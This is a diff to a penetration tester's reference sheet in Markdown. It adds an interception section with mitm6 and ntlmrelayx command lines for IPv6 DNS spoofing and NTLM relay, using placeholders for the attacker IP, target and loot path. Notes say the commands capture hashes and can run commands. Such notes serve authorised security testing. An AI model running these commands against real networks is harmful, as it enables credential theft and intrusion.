0xvext/0xvext.github.io/_posts/2019-02-18-penetration-testing-reference-sheet.md

 ### Removing line breaks and inserting commas for Nmap port specification
 `sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}' < <inputfile>`

+# Interception

+## Bettercap

+## mitm6
+`mitm6 -d <fulldomain>`

+Can run with Responder to get hashes when LLMNR is disabled.

+Or, relies on ntlmrelayx running with appropriate settings:

+## ntlmrelayx
+`ntlmrelayx.py -6 -wh <attackerip> -t smb://<targetip> -l <path/to/loot> -socks -debug`

+Can also be used to execute commands.

 # Automation
 ## Bash